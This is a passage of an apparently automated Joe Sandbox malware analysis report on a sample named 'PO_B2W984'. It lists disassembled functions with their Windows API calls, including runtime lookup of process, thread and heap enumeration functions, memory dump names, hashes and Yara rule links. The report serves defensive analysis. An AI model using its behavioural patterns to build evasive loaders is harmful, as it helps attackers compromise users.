                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                        • Instruction ID: cc5fa8bdee2d4ecec393d1f424fc7c8e78642ce55a9a4210a4061dad55ceab7a
                                                                                                                                        • Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                        • Instruction Fuzzy Hash: E6C08CA0302A050E2E50A2FC1CC450A428C8904238BA02FA1E13CC63D2D321DC972820
                                                                                                                                        Function 02DD4C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3341692771-0
                                                                                                                                        • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                        • Instruction ID: 971d4bcb40f98681362e4a9d6efd0705b0ff6d52e5e7a78dde7127ca0d1a67ff
                                                                                                                                        • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                        • Instruction Fuzzy Hash: F5C012A2600A2457EB215A9C9CC0B5572CCDB05295F1804A1D408D7340E371DC008A74
                                                                                                                                        Function 02DFBB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • timeSetEvent.WINMM(00002710,00000000,02DFBB3C,00000000,00000001), ref: 02DFBB58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Eventtime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2982266575-0
                                                                                                                                        • Opcode ID: af41d9c9adc96d4eb2c37b0777c1772169e02efa246ddf24940318e156a91774
                                                                                                                                        • Instruction ID: b9c02c09f8f8e9e591d7b9eccfc7c67c003e43f70ec13ceb7c203fb5bb3a94bc
                                                                                                                                        • Opcode Fuzzy Hash: af41d9c9adc96d4eb2c37b0777c1772169e02efa246ddf24940318e156a91774
                                                                                                                                        • Instruction Fuzzy Hash: 46C092F07923403EFA20A6EC5CC2F63658DD308B10F610812BB00EE3C2D1E24C948A74
                                                                                                                                        Function 02DD4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DD4BEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                        • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                        • Instruction ID: ab7acb529fd135444c494c1007f3cb00cb0dc603ff191908533823041b54831d
                                                                                                                                        • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                        • Instruction Fuzzy Hash: 46B0123C288E0218FB1011A10D01B32008C8F7038BF8600919EA9C83C0FF22CC01CC32
                                                                                                                                        Function 02DD4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02DD4C03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3341692771-0
                                                                                                                                        • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                        • Instruction ID: c14b5896ef3e990528d510ccb73e47aeab023aa1b9b364b479db1df8f8f09aac
                                                                                                                                        • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                        • Instruction Fuzzy Hash: 7BA022AC080F030A8F2B232C000022A2033FFE2300BCAC8E8C0000A2008F3BCC00EC30
                                                                                                                                        Function 02DD1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02DD2000), ref: 02DD16A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 835ac4c344d1cb34f353791ff78fa829f310ecbbd10c3b10381db3e2b118257c
                                                                                                                                        • Instruction ID: f5255a21a5c5ce9f3ca365c796bd2c843328af9a4fc9639d6d2a28e6aa37fa9b
                                                                                                                                        • Opcode Fuzzy Hash: 835ac4c344d1cb34f353791ff78fa829f310ecbbd10c3b10381db3e2b118257c
                                                                                                                                        • Instruction Fuzzy Hash: 36F09AB2A84B996BD711AE5ADC84B82BB94FB00326F454139FA489B340D770AC50CBE4
                                                                                                                                        Function 02DD16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DD1704
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: f9d10ed22081e2e74c713146da8ecd89b28e72bedc14130c51f5585bfa16bbd4
                                                                                                                                        • Instruction ID: ce8220ca2f6cd8b70348f5f524a32e48f98d502fb47b5d32fddfa3824e7cb021
                                                                                                                                        • Opcode Fuzzy Hash: f9d10ed22081e2e74c713146da8ecd89b28e72bedc14130c51f5585bfa16bbd4
                                                                                                                                        • Instruction Fuzzy Hash: D2E08C79300B11AFE7105A7A9D84B12ABDCEB48664F244476F649DB392D2A0EC50CB70

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 02DEA954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02DEABDB,?,?,02DEAC6D,00000000,02DEAD49), ref: 02DEA968
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02DEA980
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02DEA992
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02DEA9A4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02DEA9B6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02DEA9C8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02DEA9DA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02DEA9EC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02DEA9FE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02DEAA10
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02DEAA22
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02DEAA34
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02DEAA46
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02DEAA58
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02DEAA6A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02DEAA7C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02DEAA8E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                        • API String ID: 667068680-597814768
                                                                                                                                        • Opcode ID: 43f3a2208166fe427f59bf193f850ab6cebf7f245ab849524b775232cafd582b
                                                                                                                                        • Instruction ID: 9ebd0987659128ecda835f696dc1d6794e95242656b5392172276b1dddf17c28
                                                                                                                                        • Opcode Fuzzy Hash: 43f3a2208166fe427f59bf193f850ab6cebf7f245ab849524b775232cafd582b
                                                                                                                                        • Instruction Fuzzy Hash: A031CAB5E84B65AFEF00AFA5E889B2637ADEB05601B4009A9E007CF304D674DC548FE1
                                                                                                                                        Function 02DD58B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD58D1
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02DD58E8
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02DD5918
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD597C
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59B2
                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59C5
                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59D7
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59E3
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000), ref: 02DD5A17
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330), ref: 02DD5A23
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02DD5A45
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                        • API String ID: 3245196872-1565342463
                                                                                                                                        • Opcode ID: c48ee472776cad9edf59b1713971e1358179d5d8601248af5d7135d02e570367
                                                                                                                                        • Instruction ID: e9b12d0e3e1af4365e33bbe619e7af313935d296a77a6c097a72ee737c1e7a0e
                                                                                                                                        • Opcode Fuzzy Hash: c48ee472776cad9edf59b1713971e1358179d5d8601248af5d7135d02e570367
                                                                                                                                        • Instruction Fuzzy Hash: 9C414C71E00A69AFDB10DAE8DC88ADEB7ADEB08350F4445A5E549E7341D770EE44CF60
                                                                                                                                        Function 02DD5B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DD5B94
                                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DD5BA1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DD5BA7
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DD5BD2
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C19
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C29
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C51
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C61
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DD5C87
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DD5C97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                                                        • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                        • Instruction ID: 3fa391f046d9f42feb5c9b80d0c2226ef730d4b159cc436d984252a262cc2676
                                                                                                                                        • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                        • Instruction Fuzzy Hash: 0F319571E40A1C2AEB25D6F89C46BDF7BADCB04380F4445E19608E6285DA75DF84CF60
                                                                                                                                        Function 02DD7F54 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02DD7F75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1705453755-0
                                                                                                                                        • Opcode ID: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                                                                                                                                        • Instruction ID: 81f7beed8466cdb2bc69cac1f562f405a4db144e56f383dacb6f960f0f9cf8d1
                                                                                                                                        • Opcode Fuzzy Hash: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                                                                                                                                        • Instruction Fuzzy Hash: 8811FEB5A00609AFDB04CFA9C8809AFB7F9EFC8304B14C569A504EB354E6319E018BA0
                                                                                                                                        Function 02DDA744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                        • Instruction ID: 86a9cae7bff6a24854ae2c9913d913b85e0c4d274ee05c81d6f8fa8eeac79c0b
                                                                                                                                        • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                        • Instruction Fuzzy Hash: AFE0D83670061427D311A6685C809F6736DD75C310F00827EBD05C7340EEB0DD444EF4
                                                                                                                                        Function 02DDB70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,02DFC106,00000000,02DFC11E), ref: 02DDB71A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Version
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                        • Opcode ID: 88651218e8fa3c7128307b3ce3e147bca076633037d5e25117ff356d2298e30a
                                                                                                                                        • Instruction ID: 538b1d9dba1129aeff54d352a59a625936ed174f493ed0de51ec7c5986a21743
                                                                                                                                        • Opcode Fuzzy Hash: 88651218e8fa3c7128307b3ce3e147bca076633037d5e25117ff356d2298e30a
                                                                                                                                        • Instruction Fuzzy Hash: 33F0DA74944701AFC390DF28D540B1977E6FB49718F014969E69ACB380E734DC14CF9A
                                                                                                                                        Function 02DDA790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02DDBDF2,00000000,02DDC00B,?,?,00000000,00000000), ref: 02DDA7A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
